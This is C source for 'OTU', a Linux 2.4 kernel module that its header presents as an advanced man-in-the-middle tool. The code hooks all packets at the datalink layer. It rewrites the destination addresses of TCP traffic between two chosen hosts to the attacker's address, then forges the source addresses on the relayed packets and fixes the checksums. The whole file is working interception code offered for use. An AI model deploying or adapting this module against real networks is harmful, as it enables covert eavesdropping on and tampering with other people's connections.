/*
 * vecna@s0ftpj.org - http://www.s0ftpj.org 
 * OTU - advanced tool for man in the middle, for more info read README
 * file from our site under tools page
 *
 * 9/31 7/12 2001/infinite
 *
 */
#define __KERNEL__
#define MODULE

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/socket.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/netdevice.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/skbuff.h>
#include <linux/version.h>
#include <linux/brlock.h>
#include <linux/file.h>

#include <net/tcp.h>

static void tcpudp_csum(struct sk_buff *, unsigned int, unsigned int );
static unsigned int inet_addr(char *);

static struct packet_type lrd;

static char *host1, *host2, *mitm;
static unsigned int p1, p2, local_addr;
MODULE_PARM(host1, "s");
MODULE_PARM(host2, "s");
MODULE_PARM(mitm, "s");

/* -- *
 * packets with source 2|1 and dest 1|2 change dest with MITM.
 * packets with source MITM and dest 1|2 change source with opposite of dest
 * -- *
 * on this module coded for 2.4 kernel I use struct packet_type.func injecton
 * than hook options feature of netfilter, this because with one function I
 * can read any packet at datalink layer ad check PACKET_OTHERHOST and 
 * PACKET_HOST and PACKET_OUTGOING more easy.
 * this is less performantic but can't to be a big problem :P
 * -- */

static int redir(struct sk_buff *skb, 
		 struct net_device *dev, 
		 struct packet_type *pt)
	{
	unsigned int osaddr =skb->nh.iph->saddr;
	unsigned int odaddr =skb->nh.iph->daddr;

	unsigned int *src_ip =&skb->nh.iph->saddr;
	unsigned int *dst_ip =&skb->nh.iph->daddr;

	if(skb->nh.iph->protocol !=IPPROTO_TCP)
		goto end;

	if(*src_ip ==local_addr && (*dst_ip ==p2 || *dst_ip ==p1))
		{
		*src_ip =(*dst_ip ==p2) ? p1 : p2;
		goto checksum;
		}

	if((*src_ip ==p1 && *dst_ip ==p2) || (*dst_ip ==p1 && *src_ip ==p2))
		*dst_ip =local_addr;

checksum:
	skb->nh.iph->check =0x0000;
	ip_send_check(skb->nh.iph);

	tcpudp_csum(skb, osaddr, odaddr);

end:
	kfree_skb(skb);
	return(0);
	}

void tcpudp_csum(struct sk_buff *x, unsigned int osaddr, unsigned int odaddr)
	{
	struct iphdr *iph =x->nh.iph;
	unsigned short check =0x0000;
	unsigned short *cksum;

	cksum  =(unsigned short *)&((struct tcphdr *)
		(((char *)iph) +(iph->ihl<<2)))->check;
	check  =csum_tcpudp_magic(iph->saddr, iph->daddr, 0, IPPROTO_TCP, 
		~(*cksum));
	*cksum =csum_tcpudp_magic(~osaddr, ~odaddr, 0, 0, ~check);
	*cksum +=htons(IPPROTO_TCP);
	}

init_module(void)
	{
	/* setting hook struct */

	if((host1 ==NULL && host2 ==NULL) || mitm ==NULL)
		{
		printk(KERN_ERR "insmod lshjk.o host1=foo.com host2=wow2.net"
				" mitm=myip.it\n");
		return -EDESTADDRREQ;
		}

	p1 =(host1 !=NULL) ? inet_addr(host1) : 0;
	p2 =(host2 !=NULL) ? inet_addr(host2) : 0;

	local_addr =inet_addr(mitm);

	lrd.type =htons(ETH_P_ALL);
	lrd.func =redir;
	lrd.dev =NULL;

	dev_add_pack(&lrd);

	printk(KERN_INFO "otu - vecna@s0ftpj.org\n");

	return 0;
	}

void cleanup_module(void)
	{
	dev_remove_pack(&lrd);

	printk(KERN_INFO "otu unloaded\n");
	}

unsigned int inet_addr(char *str) 
	{
	unsigned long l;
	unsigned int val;
	int i;

	l = 0;
	for (i =0; i < 4; i++)
		{
		l <<= 8;
		if(*str !='\0')
			{
			val = 0;
			while (*str != '\0' && *str != '.')
				{
				val *= 10;
				val += *str - '0';
				str++;
				}

			l |= val;
			if (*str != '\0')
				str++;
			}
		}

	return(htonl(l));
	}
